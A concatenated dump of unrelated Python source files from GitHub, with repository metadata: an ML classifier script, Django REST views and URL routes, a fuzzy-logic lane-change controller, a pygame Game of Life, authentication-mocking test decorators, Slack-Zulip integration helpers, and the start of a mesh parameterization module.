select_boosting_params(X:pd.DataFrame,\n y:pd.Series,\n param_grid:dict, classifier) -> dict:\n \"\"\" Подбираем параметры c помощью GridSearch и кроссвалидации \"\"\"\n grid_search = GridSearchCV(classifier,\n param_grid,\n cv=CV_FOLDS,\n scoring=SCORING,\n n_jobs=-1,\n verbose=1)\n grid_search.fit(X, y)\n print(f\"The best parameters for {classifier.__class__.__name__}:\\\n \\n{grid_search.best_params_}\\n\")\n return grid_search.best_params_\n\n\ndef plot_roc_auc(classifiers:list, X:pd.DataFrame, y:pd.Series, title:str)->None:\n \"\"\" Построим ROC кривые для всех моделей \"\"\"\n plt.figure(figsize=(8, 6))\n plt.plot([0, 1], [0, 1], 'k--')\n X_train, X_test, y_train, y_test = train_test_split(X, y, \n test_size=0.1,\n random_state=42)\n for classifier in classifiers:\n classifier.fit(X_train, y_train)\n y_pred = classifier.predict_proba(X_test)[:, 1]\n fpr, tpr, _ = roc_curve(y_test, y_pred)\n auc_score = roc_auc_score(y_test, y_pred)\n label = f'{classifier.__class__.__name__} (AUC = {auc_score:.3f})'\n plt.plot(fpr, tpr, label=label)\n\n plt.xlabel('False positive rate')\n plt.ylabel('True positive rate')\n plt.title(title)\n plt.legend()\n plt.savefig(f\"{PREDICTIONS_FOLDER}task1 {title}.png\")\n plt.show()\n\n\ndef test_classifiers(classifiers:list, X:pd.DataFrame, y:pd.Series,) -> dict:\n \"\"\" Проверим качество моделей с помощью кроссвалидации \"\"\"\n scorings = {}\n for classifier in classifiers:\n cv = RepeatedStratifiedKFold(n_splits=10, n_repeats=3, random_state=1)\n n_scores = cross_val_score(classifier, X, y, \n scoring=SCORING, \n cv=cv,\n n_jobs=-1,\n error_score='raise')\n scorings[classifier.__class__.__name__] = np.mean(n_scores)\n return scorings\n\n\ndef make_barplot(results:dict, title:str) -> None:\n \"\"\" Построим barplot c результата классификации \"\"\"\n df = pd.Series(results).sort_values(ascending=True, inplace=False)\n plt.figure(figsize=(12, 6))\n plt.barh(df.index, df.values, align='center', alpha=0.8, left=0.17)\n plt.title(title)\n plt.savefig(f\"{PREDICTIONS_FOLDER}task1 {title}.png\")\n plt.show()\n\n\ndef fit_and_predict(classifier,\n X:pd.DataFrame,\n y:pd.Series,\n X_test:pd.DataFrame) -> None:\n \"\"\" Обучим модель train данных и сделаем предсказания \"\"\"\n classifier.fit(X, y)\n y_pred = classifier.predict(X_test)\n y_pred = pd.DataFrame(y_pred, columns=['y'])\n predictions_path = f\"{PREDICTIONS_FOLDER}task1_predictions.csv\"\n y_pred.to_csv(predictions_path, index=False)\n print(f\"Predictions saved to {predictions_path}\")\n\n\ndef main():\n # Загрузим данные\n data = pd.read_csv(TRAIN_PATH, sep=\";\")\n X_to_predict = pd.read_csv(TEST_PATH, sep=\";\")\n\n # Проведем исследовательский анализ данных\n explore_data(data)\n \"\"\"\n Основные выводы:\n - Все остальные колонки имеют числовой тип данных. \n - Данные между классами распределены почти поровну (1-7506, 0-7494)\n - Во всех столбцах более 17% (2683/15000) пропусков.\n - Есть незначительное количество (61) строк с аутлаерами.\n - Среднее сильно отличается между колонкам, поэтому необходима нормализация. \n - Значения во колонке stat_2 принадлежат к небольшому набору (46).\n Значения целочисленные. Это может говорить о том, что это категориальный признак.\n \"\"\"\n\n # Разделим фичи и результаты\n X, y = split_xy(data)\n\n # Закодируем категориальные признаки\n X, X_to_predict = encode_categorical_data(X, X_to_predict,\n CATEGORICAL_FEATURES)\n\n # Нормализуем фичи\n X, X_to_predict = scale_data(X, X_to_predict, CATEGORICAL_FEATURES)\n\n # # Подберем и сохраним в виде констант параметры для бустингов\n # lgbm_params = select_boosting_params(X, y, LGBM_PARAM_GRID, LGBMClassifier())\n # xgb_params = select_boosting_params(X, y, XGB_PARAM_GRID, XGBClassifier())\n\n # Нарисуем ROC кривые для моделей без замены NaN\n plot_roc_auc(CLASSIFIERS_NAN_TOLERANT, X, y,\n title=\"ROC AUC без замены NaN средними\")\n\n # Проверим качество моделей с помощью f1 метрики и кроссвалидации\n scorings = test_classifiers(CLASSIFIERS_NAN_TOLERANT, X, y)\n\n # Построим barplot c результата классификации\n make_barplot(scorings, f\"{SCORING} метрика моделей без замены NaN средними\")\n\n # Предобработаем данные\n # Заменим пропущенные значения средними значениями по столбцам.\n data_preprocessed = replace_missing_with_avg(data)\n\n # Удалим аутлаеры\n data_preprocessed = detect_and_remove_outliers(data_preprocessed)\n\n # Разделим фичи и результаты \n X_preprocessed, y_preprocessed = split_xy(data_preprocessed)\n\n # Нарисуем ROC кривые для моделей с предобработкой данных \n plot_roc_auc(CLASSIFIERS_NAN_INTOLERANT, X_preprocessed, y_preprocessed,\n title=\"ROC AUC с заменой NaN средними\")\n\n # Проверим качество моделей с помощью f1 метрики и кроссвалидации\n scorings = test_classifiers(CLASSIFIERS_NAN_INTOLERANT, X_preprocessed, y_preprocessed )\n\n # Построим barplot c результата классификации\n make_barplot(scorings, f\"{SCORING} метрика моделей с заменой NaN средними\")\n\n # Предскажем результаты для тестовых данных\n # fit_and_predict(BEST_CLASSIFIER, X, y, X_to_predict)\n\n\nif __name__ == \"__main__\":\n main()\n\n\n# TODO:\n# Сделать версии для запуска из Java\n# Писать на самих барплотах скор\n# Поправить имена моделей в барплотах\n# Сделать 9 графиков на одной картинке для задания 2\n# Проверять существование папок перед сохранени�� файлов\n# Написать тесты\n\n# DOCS:\n# https://biodatamining.biomedcentral.com/articles/10.1186/s13040-023-00322-4","repo_name":"dkleptsov/deeplay","sub_path":"task_1.py","file_name":"task_1.py","file_ext":"py","file_size_in_byte":14137,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26712968267","text":"\nfrom django.contrib.auth import get_user_model\n# from .admin_views import CableTvProvidersViewSet\nUser = get_user_model()\nfrom django.shortcuts import get_object_or_404, render\nfrom rest_framework import viewsets, status\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nimport jwt, uuid, json\nfrom django.contrib.auth.hashers import make_password, check_password\nfrom django.db import transaction\nfrom utilities.models import *\n\n \nclass GetNetworkProviderView(APIView):\n \n def get(self, request):\n try:\n results = NetworkProviders.objects.all().values('public_id','isp_name','api_provider')\n return Response({\"status\": True, \"message\":\"Network providers successfully retrieved\", \"data\": list(results)}, status=status.HTTP_200_OK)\n except Exception as e:\n return Response({\"status\": False, \"data\": str(e)})\n \n # @is_admin\n def post(self,request):\n data = request.data\n data['public_id'] = uuid.uuid4()\n network_provider = NetworkProviders.objects.create(**data)\n if network_provider:\n response = {\"status\":True,\"message\":f\"Network provider ({network_provider.isp_name}) was created\"}\n return Response(response,status = status.HTTP_201_CREATED)\n else:\n response = {\"status\":False,\"message\":f\"Network provider ({network_provider.isp_name}) was not created\"}\n return Response(response,status=status.HTTP_200_OK)\n \nclass GetDataSubscriptionView(APIView):\n def get(self, request, uid):\n try:\n results = DataSubscriptions.objects.all().filter(plan_provider_id=get_object_or_404(NetworkProviders,public_id=uid).id).values('plan_provider_id','plan_name','plan_code','plan_price','duration','api_provider')\n if results:\n data_struct = []\n for plan in range(len(results)):\n data_struct.append(results[plan])\n return Response({\"status\": True, \"message\":\"Data plan for {0} successfully retrieved\".format(uid), \"data\": data_struct}, status=status.HTTP_200_OK)\n else:\n return Response({\"status\": False, \"data\":\"Could not retrieve data plans\"})\n \n except Exception as e:\n return Response({\"status\": False, \"data\": str(e)})\n \nclass GetCableTvProvidersView(APIView):\n def get(self, request):\n try:\n results = CableTvProviders.objects.all().values('id','public_id','cabletv_name','api_provider')\n if results:\n return Response({\"status\": True, \"message\":\"Cable Tv providers successfully retrieved\", \"data\": results}, status=status.HTTP_200_OK)\n else:\n return Response({\"status\": True, \"message\":\"No results were found!\", \"data\": []}, status=status.HTTP_200_OK)\n except Exception as e:\n return Response({\"status\": False, \"data\": str(e)})\n \n def post(self,request):\n data = request.data\n data['public_id'] = uuid.uuid4()\n cable_provider = CableTvProviders.objects.create(**data)\n if cable_provider:\n response = {\"status\":True,\"message\":f\"Cable provider ({cable_provider.cabletv_name}) was created\"}\n return Response(response,status = status.HTTP_201_CREATED)\n else:\n response = {\"status\":False,\"message\":f\"Cable provider ({cable_provider.cabletv_name}) was not created\"}\n return Response(response,status=status.HTTP_200_OK)\n \nclass GetCableTvBouquetsView(APIView):\n def get(self, request):\n try:\n id = request.GET.get('id')\n results = CableTvBouquets.objects.all().filter(bouquet_provider_id=int(id)).values('bouquet_provider_id','bouquet_name','bouquet_price','bouquet_code','api_provider')\n if results:\n return Response({\"status\": True, \"message\":\"Tv bouquets successfully retrieved\", \"data\": results}, status=status.HTTP_200_OK)\n else:\n return Response({\"status\": False, \"data\":\"Could not retrieve data plans\"})\n \n except Exception as e:\n print(str(e))\n return Response({\"status\": False, \"data\": str(e)})\n\nclass GetElectricityDiscos(APIView):\n def get(self, request):\n try:\n results = ElectricityDiscos.objects.all().values('public_id','disco_name','disco_code','api_provider','api_code')\n disco_struct = []\n for disco in range(len(results)):\n disco_struct.append(results[disco])\n return Response({\"status\": True, \"message\":\"Discos successfully retrieved\", \"data\": disco_struct}, status=status.HTTP_200_OK)\n \n except Exception as e:\n return Response({\"status\": False, \"data\": e})\n \n","repo_name":"Pybool/Quickee","sub_path":"escrow-backend/utilities/views/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14465656551","text":"#importing libraries\nimport numpy as np\nimport skfuzzy as fuzz\nfrom skfuzzy import control as ctrl\nimport matplotlib\n#configuring input and output variables\nrange_of_y = 1000\ny=ctrl.Antecedent(np.arange(0,range_of_y+0.1,0.01),'lateral lane displacement')\nrange_of_acc= 300\ny_acc=ctrl.Antecedent(np.arange(0,range_of_acc,0.001),'lateral accelaration')\nerror=100\ne=ctrl.Antecedent(np.arange(-error,error,0.1),'error')\ny['first']=fuzz.trapmf(y.universe,[0,range_of_y/16,3*range_of_y/16,4*range_of_y/16])\ny['second']=fuzz.trapmf(y.universe,[5*range_of_y/16,6*range_of_y/16,7*range_of_y/16,8*range_of_y/16])\ny['third']=fuzz.trapmf(y.universe,[9*range_of_y/16,10*range_of_y/16,11*range_of_y/16,12*range_of_y/16])\ny['final']=fuzz.trapmf(y.universe,[13*range_of_y/16,14*range_of_y/16,15*range_of_y/16,16*range_of_y/16])\ny_acc['GT0']=fuzz.trimf(y_acc.universe,[1,range_of_acc/2,range_of_acc])\ny_acc['GE0']=fuzz.trimf(y_acc.universe,[0,range_of_acc/2,range_of_acc])\ny_acc['LTM']=fuzz.trimf(y_acc.universe,[-range_of_acc,0,range_of_acc-1])\ny_acc['GEM']=fuzz.trimf(y_acc.universe,[range_of_acc,range_of_acc,range_of_acc])\ny_acc['GT-M']=fuzz.trimf(y_acc.universe,[-range_of_acc+1,0,range_of_acc])\ny_acc['LE-M']=fuzz.trimf(y_acc.universe,[-range_of_acc,-range_of_acc,-range_of_acc])\ny_acc['LT0']=fuzz.trimf(y_acc.universe,[-range_of_acc,-range_of_acc/2,-1])\ny_acc['LE0']=fuzz.trimf(y_acc.universe,[-range_of_acc,-range_of_acc/2,0])\ne['N']=fuzz.trimf(e.universe,[-error,-error,-1])\ne['Z']=fuzz.trimf(e.universe,[-error/2,0,error/2])\ne['P']=fuzz.trimf(e.universe,[1,error,error])\n\nstear_angle=0.006\nangle=ctrl.Consequent(np.arange(-stear_angle,stear_angle,0.0001),'stear_angle')\nangle['s1']=fuzz.trimf(angle.universe,[0,0.0006/2,0.0006])\nangle['b1']=fuzz.trimf(angle.universe,[0.00060001,0.0017,0.0034])\nangle['b2']=fuzz.trimf(angle.universe,[0.0034001,0.0037,0.004])\nangle['b3']=fuzz.trimf(angle.universe,[0.004001,0.0043,0.0046])\nangle['s1']=fuzz.trimf(angle.universe,[0,0.0006/2,0.0006])\nangle['b1']=fuzz.trimf(angle.universe,[0.00060001,0.0017,0.0034])\nangle['b2']=fuzz.trimf(angle.universe,[0.0034001,0.0037,0.004])\nangle['b3']=fuzz.trimf(angle.universe,[0.004001,0.0043,0.0046])\nangle['-s1']=fuzz.trimf(angle.universe,[-0.0006,-0.0006/2,0])\nangle['-b1']=fuzz.trimf(angle.universe,[-0.0034,-0.0017,-0.00060001])\nangle['-b2']=fuzz.trimf(angle.universe,[-0.004,-0.0037,-0.0034001])\nangle['-b3']=fuzz.trimf(angle.universe,[-0.0046,-0.0043,-0.004001])\nangle['0']=fuzz.trimf(angle.universe,[0,0,0])\n \n#rules\nrule1=ctrl.Rule(y['first'] & y_acc['LTM'] & e['N'],angle['b3'])\nrule2=ctrl.Rule(y['first'] & y_acc['LTM'] & e['Z'],angle['b2'])\nrule3=ctrl.Rule(y['first'] & y_acc['LTM'] & e['P'],angle['b1'])\nrule4=ctrl.Rule(y['first'] & y_acc['GEM'] & e['N'],angle['-s1'])\nrule5=ctrl.Rule(y['first'] & y_acc['GEM'] & e['Z'],angle['0'])\nrule6=ctrl.Rule(y['first'] & y_acc['GEM'] & e['P'],angle['-s1'])\nrule7=ctrl.Rule(y['second'] & y_acc['GT0'] & e['N'],angle['-b1'])\nrule8=ctrl.Rule(y['second'] & y_acc['GT0'] & e['Z'],angle['-b2'])\nrule9=ctrl.Rule(y['second'] & y_acc['GT0'] & e['P'],angle['-b3'])\nrule10=ctrl.Rule(y['second'] & y_acc['LE0'] & e['N'],angle['s1'])\nrule11=ctrl.Rule(y['second'] & y_acc['LE0'] & e['Z'],angle['0'])\nrule12=ctrl.Rule(y['second'] & y_acc['LE0'] & e['P'],angle['-s1'])\nrule13=ctrl.Rule(y['third'] & y_acc['GT-M'] & e['N'],angle['-b1'])\nrule14=ctrl.Rule(y['third'] & y_acc['GT-M'] & e['Z'],angle['-b2'])\nrule15=ctrl.Rule(y['third'] & y_acc['GT-M'] & e['P'],angle['-b3'])\nrule16=ctrl.Rule(y['third'] & y_acc['LE-M'] & e['N'],angle['s1'])\nrule17=ctrl.Rule(y['third'] & y_acc['LE-M'] & e['Z'],angle['0'])\nrule18=ctrl.Rule(y['third'] & y_acc['LE-M'] & e['P'],angle['-s1'])\nrule19=ctrl.Rule(y['final'] & y_acc['LT0'] & e['N'],angle['-b1'])\nrule20=ctrl.Rule(y['final'] & y_acc['LT0'] & e['Z'],angle['-b2'])\nrule21=ctrl.Rule(y['final'] & y_acc['LT0'] & e['P'],angle['-b3'])\nrule22=ctrl.Rule(y['final'] & y_acc['GE0'] & e['N'],angle['s1'])\nrule23=ctrl.Rule(y['final'] & y_acc['GE0'] & e['Z'],angle['0'])\nrule24=ctrl.Rule(y['final'] & y_acc['GE0'] & e['P'],angle['-s1'])\n\n#feeding rules to ControlSystem\ndla_ctrl=ctrl.ControlSystem([rule1,rule2,rule3,rule4,rule5,rule6,rule7,rule8,rule9,rule10,rule11,rule12,rule13,rule14,rule15,rule16,rule17,rule18,rule19,rule20,rule21,rule22,rule23,rule24])\ndla=ctrl.ControlSystemSimulation(dla_ctrl)\n","repo_name":"sairavitejailla/Lane-Change-maneuver--Fuzzy-Logic","sub_path":"fuzzyControl.py","file_name":"fuzzyControl.py","file_ext":"py","file_size_in_byte":4334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8685868705","text":"import pygame\nfrom sys import exit\nfrom settings import *\nfrom grid import Grid\n\n\nclass Game():\n\n\tdef __init__(self) -> None:\n\t\tpygame.init()\n\t\tself.screen = pygame.display.set_mode((WIDTH, HEIGHT))\n\t\tpygame.display.set_caption(\"Conwa's Game of Life\")\n\t\tself.clock = pygame.time.Clock()\n\t\tself.grid = Grid()\n\t\tself.started = False\n\n\n\tdef __call__(self) -> None:\n\t\tself.run()\n\n\t# Main game loop\n\tdef run(self) -> None:\n\t\twhile True:\n\t\t\tfor event in pygame.event.get():\n\t\t\t\tif event.type == pygame.QUIT:\n\t\t\t\t\tpygame.quit()\n\t\t\t\t\texit()\n\t\t\t\telif event.type == pygame.KEYDOWN:\n\t\t\t\t\tif event.key == pygame.K_RETURN:\n\t\t\t\t\t\tself.started = not self.started\n\t\t\t\t\telif event.key == pygame.K_r and not self.started:\n\t\t\t\t\t\tself.grid.reset()\n\n\t\t\t\tif not self.started:\n\t\t\t\t\tif event.type == pygame.MOUSEBUTTONDOWN:\n\t\t\t\t\t\tpos = pygame.mouse.get_pos()\n\t\t\t\t\t\tself.grid.check_click(pos)\n\n\t\t\tself.screen.fill(BLACK)\n\t\t\tif self.started:\n\t\t\t\tself.grid.update()\n\t\t\tself.grid.draw()\n\t\t\tpygame.display.update()\n\t\t\t\n\t\t\tself.clock.tick(FPS)","repo_name":"andreimihai2305/conways-game-of-life","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70572683689","text":"kor = '포도'\neng = 'grape'\nd = dict(eng='apple', kor='사과')\n\ns = '{kor}의 영어 표현은 {eng}입니다.'\nprint(s.format(**locals()))\nprint(s.format(**d))\n\nd = {'재고품목': ['펜','연필', '편지 봉투', '종이 클립','메모장']}\nprint('우리가 현재 재고로 가지고 있는 품목은 {재고품목[0]}, {재고품목[2]}입니다.'.format(**d))","repo_name":"bellepoque7/Python_Intro","sub_path":"Python_Intro/2.[End]SNU_BDI_Python_II/02Day/02String_Formatting/02(Un)Unpacking.py","file_name":"02(Un)Unpacking.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42699821185","text":"from django.contrib import admin\nfrom django.urls import path, include, re_path\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.views.generic import TemplateView\n\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n # djoser\n path('auth/', include('djoser.urls')),\n path('auth/', include('djoser.urls.jwt')),\n path('auth/', include('djoser.social.urls')),\n # apps\n path('auth/', include('apps.accounts.urls')),\n path('api/products/', include('apps.product.urls')),\n path('api/shopping_cart/', include('apps.shopping_cart.urls')),\n path('api/payment/', include('apps.payment.urls')),\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"LDA407/api_para_vender_ropas","sub_path":"config/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1983190373","text":"import argparse\nimport logging\nfrom pathlib import Path\n\nfrom tqdm import tqdm\n\nfrom src.utils.argparser import create_dataextractor_parser\nfrom src.utils.io import download_from_bucket, get_downstream_dir\n\n# from numpy.typing import DTypeLike\n\n\n_logger = logging.getLogger(__name__)\n_handler = logging.StreamHandler()\n_handler.setStream(tqdm)\n_logger.addHandler(_handler)\n\n\nclass Extractor:\n def __init__(\n self,\n gcs_dir: Path,\n output_path: Path = get_downstream_dir(),\n ):\n self._gcs_dir = gcs_dir\n self._output_path = output_path\n\n def get(self, file: str):\n \"\"\"\n\n Args:\n file: specify value of gcs file path\n\n Returns:\n \"\"\"\n gcs_path = self._gcs_dir.joinpath(file)\n file_path = self._output_path.joinpath(file)\n download_from_bucket(file_path, gcs_path)\n\n\ndef main():\n dataextractor_parser = create_dataextractor_parser()\n parser = argparse.ArgumentParser(parents=[dataextractor_parser])\n args = parser.parse_args()\n extractor = Extractor(args.gcs_dir)\n _logger.info(\"Fetching and Saving data from gcs\")\n for file in args.files:\n _logger.info(f\"start Getting data --- path: {args.gcs_dir}/{file}\")\n extractor.get(file)\n\n\nif __name__ == \"__main__\":\n logging.basicConfig()\n logging.getLogger().setLevel(logging.DEBUG)\n main()\n","repo_name":"mzk622/BERT-for-PAS","sub_path":"src/dataextractor/extractor.py","file_name":"extractor.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14960893582","text":"\"\"\"Test decorators.\"\"\"\n\nimport json\nimport os\nfrom functools import wraps\n\nimport requests\n\n\ndef parse_response_to_json(func):\n \"\"\"Decorator that parses the response body into JSON and passes it to the\n function, then it saves the changes into the response body again.\n \"\"\"\n\n @wraps(func)\n def wrapper(response):\n try:\n json_response = json.loads(response[\"body\"][\"string\"])\n except (json.decoder.JSONDecodeError, UnicodeDecodeError):\n json_response = {}\n response, json_response = func(response, json_response)\n if response is not None and json_response:\n response[\"body\"][\"string\"] = json.dumps(json_response).encode()\n return response\n\n return wrapper\n\n\ndef assert_authorization(func):\n \"\"\"Decorator that ensures that the API key is being passed to our\n endpoints, and the login endpoint is called if email/password is provided.\n \"\"\"\n\n @wraps(func)\n def wrapper(*args, mocker, **kwargs):\n host = os.getenv(\"GENCOVE_HOST\")\n api_key = os.getenv(\"GENCOVE_API_KEY_TEST\")\n email = os.getenv(\"GENCOVE_EMAIL_TEST\")\n password = os.getenv(\"GENCOVE_PASSWORD_TEST\")\n using_api_key = os.getenv(\"USING_API_KEY\")\n\n def mock_get_auth(url, *args, headers, **kwargs):\n if host in url and using_api_key:\n assert (\n headers[\"Authorization\"] == f\"Api-Key {api_key}\"\n ), f\"No valid authorization header provided for GET-{url}\"\n kwargs[\"headers\"] = headers\n return requests.get(url, *args, **kwargs)\n\n mocker.patch(\"gencove.client.get\", side_effect=mock_get_auth)\n login_called = False\n\n def mock_post_auth(url, data, *args, headers, **kwargs):\n nonlocal login_called\n if host in url and using_api_key:\n assert (\n headers[\"Authorization\"] == f\"Api-Key {api_key}\"\n ), f\"No valid authorization header provided for POST-{url}\"\n elif host in url:\n if url.endswith(\"jwt-create/\"):\n login_called = True\n data_json = json.loads(data)\n assert data_json[\"email\"] == email\n assert data_json[\"password\"] == password\n else:\n assert \"Bearer \" in headers.get(\"Authorization\")\n kwargs[\"headers\"] = headers\n return requests.post(url, data, *args, **kwargs)\n\n mocker.patch(\"gencove.client.post\", side_effect=mock_post_auth)\n kwargs[\"mocker\"] = mocker\n func(*args, **kwargs)\n if not using_api_key:\n assert login_called, \"jwt-create endpoint was not called\"\n\n return wrapper\n\n\ndef assert_no_requests(func):\n \"\"\"Decorator that mocks get, post and delete and asserts that\n none of those methods are called\n \"\"\"\n\n @wraps(func)\n def wrapper(*args, mocker, **kwargs):\n mock_get = mocker.patch(\"gencove.client.get\")\n mock_post = mocker.patch(\"gencove.client.post\")\n mock_delete = mocker.patch(\"gencove.client.delete\")\n\n kwargs[\"mocker\"] = mocker\n func(*args, **kwargs)\n\n mock_get.assert_not_called()\n mock_post.assert_not_called()\n mock_delete.assert_not_called()\n\n return wrapper\n","repo_name":"gncv/gencove-cli","sub_path":"gencove/tests/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":3328,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"6915499011","text":"from flask_login import current_user\nfrom integration.utilities import slackHeader, parseZulipRC\nfrom requests import post, get, patch\n\n\ndef zulipWebhook(topic, content, **kwargs):\n \"\"\"\n Post a message to Zulip.\n\n :param topic: Topic to send the message to\n :type topic: String\n\n :param content: A Zulip formatted string\n :type content: String\n\n :param kwargs: Files\n :type kwargs: List of Tuples that contains a filename and URL\n \"\"\"\n\n zulipAuth = parseZulipRC(current_user.zulipBotRC)\n slackAuth = slackHeader(current_user.slackToken)\n\n message = {\n \"type\": \"stream\",\n \"to\": \"Slack\",\n \"topic\": topic,\n \"content\": content\n }\n\n files = kwargs.get('files')\n if files is not None:\n for (filename, fileurl) in files:\n # Get the raw content of the uploaded Slack file, by providing authentication to private URL\n fileFromSlack = get(fileurl, headers=slackAuth)\n # ensure file is under the 25MB Zulip limit\n if int(fileFromSlack.headers['content-Length']) < 25_000_000:\n result = post(zulipAuth['site'] + '/api/v1/user_uploads', files={'filename': (filename, fileFromSlack.content)}, auth=(zulipAuth['email'], zulipAuth['key']))\n message['content'] += f\"[{filename}]({result.json()['uri']})\" + \"\\n\"\n else:\n message['content'] += f\"File too large to display directly [{filename}]({fileurl})\" + \"\\n\"\n\n # post the message to Zulip\n post(zulipAuth['site'] + \"/api/v1/messages\", auth=(zulipAuth['email'], zulipAuth['key']), data=message)\n\n return \"Message sent\"\n\n\ndef getZulipTopicList():\n \"\"\"\n Get a list of topics in the Zulip workspace.\n \"\"\"\n zulipAuth = parseZulipRC(current_user.zulipBotRC)\n\n getAllTopicsRequest = get(zulipAuth['site'] + f\"/api/v1/users/me/{getStreamID()}/topics\", auth=(zulipAuth['email'], zulipAuth['key']))\n getAllTopicsRequest = getAllTopicsRequest.json()['topics']\n\n return [topic['name'] for topic in getAllTopicsRequest]\n\n\ndef getStreamID(streamName='Slack'):\n \"\"\"\n By default get the StreamID of the Slack stream in Zulip.\n\n :param streamName: The stream name to find the ID of, by default 'Slack'\n :type streamName: String\n \"\"\"\n zulipAdminAuth = parseZulipRC(current_user.zulipAdminRC)\n return get(zulipAdminAuth['site'] + \"/api/v1/get_stream_id\", auth=(zulipAdminAuth['email'], zulipAdminAuth['key']), params={'stream' : streamName}).json()['stream_id']\n\n\ndef deleteTopic(topicName):\n \"\"\"\n Given a topic name delete it from Zulip if it exists\n\n :param topicName: Name of topic to delete\n :type topicName: String\n \"\"\"\n zulipAdminAuth = parseZulipRC(current_user.zulipAdminRC)\n\n # Delete method from api, not currently added to documentation but live: https://github.com/zulip/zulip/commit/ac55a5222c977ae2c507fb34ec5081c6ab018c16\n post(zulipAdminAuth['site'] + \"/json/streams/\" + str(getStreamID()) + \"/delete_topic\", data={\"topic_name\": topicName}, auth=(zulipAdminAuth['email'], zulipAdminAuth['key']))\n\n\ndef renameTopic(oldName, newName):\n \"\"\"\n Rename a topic in the Zulip workplace.\n\n :param oldName: The old channel name\n :type oldName: String\n\n :param newName: The new channel name\n :type newName: String\n\n \"\"\"\n zulipAuth = parseZulipRC(current_user.zulipBotRC)\n\n params = {'anchor': 'newest',\n 'num_before': 1,\n 'num_after': 0,\n 'narrow': '[{\"operator\": \"stream\", \"operand\" : \"Slack\"}, {\"operator\" : \"topic\", \"operand\" : \"' + oldName + '\"}]'\n }\n\n messageID = get(zulipAuth['site'] + \"/api/v1/messages\", auth=(zulipAuth['email'], zulipAuth['key']), params=params)\n messageID = messageID.json()\n try:\n messageID = messageID['messages'][0]['id']\n except:\n messageID = None\n\n if messageID is not None:\n message = {\n 'topic': newName,\n 'propagate_mode': 'change_all'\n }\n\n # change all the messages to have a new topic\n patch(zulipAuth['site'] + \"/api/v1/messages/\" + str(messageID), auth=(zulipAuth['email'], zulipAuth['key']), data=message)","repo_name":"fentonreid/SlackZulipIntegration","sub_path":"integration/webhooks/zulipWebHook.py","file_name":"zulipWebHook.py","file_ext":"py","file_size_in_byte":4178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27427136475","text":"'''\nfor opened mesh parameterization\n'''\nfrom copy import deepcopy\nfrom functools import reduce\nimport numpy_indexed as npi\nfrom scipy.sparse import csc_matrix\nfrom scipy.sparse.linalg import spsolve\nfrom tqdm import tqdm\nfrom utils import *\n\n'''\nreturn (\n inn_verts: list,\n bnd_verts: list,\n bnd_length: float\n)\n'''\ndef split_bnd_inn(msh: Trimesh) -> tuple:\n bnd_edges = npi.difference(msh.edges_unique, msh.face_adjacency_edges)\n\n bnd_verts = np.array([*bnd_edges[0]])\n bnd_edges = np.delete(bnd_edges, [0], axis=0)\n\n success = True\n while success:\n success = False\n last = bnd_verts[-1]\n for idx, edge in enumerate(bnd_edges):\n if last == edge[0]:\n success = True\n last = edge[1]\n elif last == edge[1]:\n success = True\n last = edge[0]\n if success:\n bnd_verts = np.append(bnd_verts, last)\n bnd_edges = np.delete(bnd_edges, [idx], axis=0)\n break\n\n inn_verts = npi.difference(msh.face_adjacency_edges.flatten(), bnd_verts)\n return (inn_verts, bnd_verts)\n\n'''\nparameterize mesh boundary to square (with pivot limits)\nreturn f_B: list\n'''\ndef mapping_boundary(msh: Trimesh, bnd_verts: list, pivots: list, scale: float=2.) -> list:\n # find pivots[0] in bnd_verts, and shift it to the first with rotate\n _bak = deepcopy(bnd_verts)\n bnd_verts = np.roll(bnd_verts, -np.where(bnd_verts == pivots[0])[0][0])\n # split bnd_verts into 4 parts\n splitted = np.split(bnd_verts, [\n np.where(bnd_verts == pivots[1])[0][0],\n np.where(bnd_verts == pivots[2])[0][0],\n np.where(bnd_verts == pivots[3])[0][0],\n ])\n for sub_bnd in splitted:\n if len(sub_bnd) == 0:\n # reverse order of _bak\n print('reverse')\n # bnd_verts = np.append([bnd_verts[0]], bnd_verts[1:][::-1])\n return mapping_boundary(msh, _bak[::-1], pivots, scale)\n\n print('bound: ', bnd_verts[:3])\n f_B = mapping_fixed_boundary(msh, bnd_verts, scale)\n \n return f_B\n\ndef mapping_fixed_boundary(msh: Trimesh, bnds: list, scale: float) -> list:\n bnds = np.append(bnds, bnds[0])\n bnd_size = len(bnds)\n lengths = sum([mesh_vert_dist(msh, *bnds[i:i+2]) for i in range(bnd_size - 1)])\n f_B = np.empty((0, 2))\n\n last_v = bnds[0]\n bnds = bnds[1:]\n accumed = 0.\n _first = 3\n for bnd in bnds: # last_v to bnd\n old_ratio = accumed / lengths\n accumed += mesh_vert_dist(msh, last_v, bnd)\n new_ratio = accumed / lengths\n flag = -reduce(\n lambda x, y: x * (\n 1 if ((y - old_ratio) * (y - new_ratio)) > 0 \n else -y\n ),\n [0.25, 0.5, 0.75],\n 1\n )\n if flag > 0:\n new_ratio = flag\n vpos = (0., 0.)\n if new_ratio < 0.25:\n vpos = 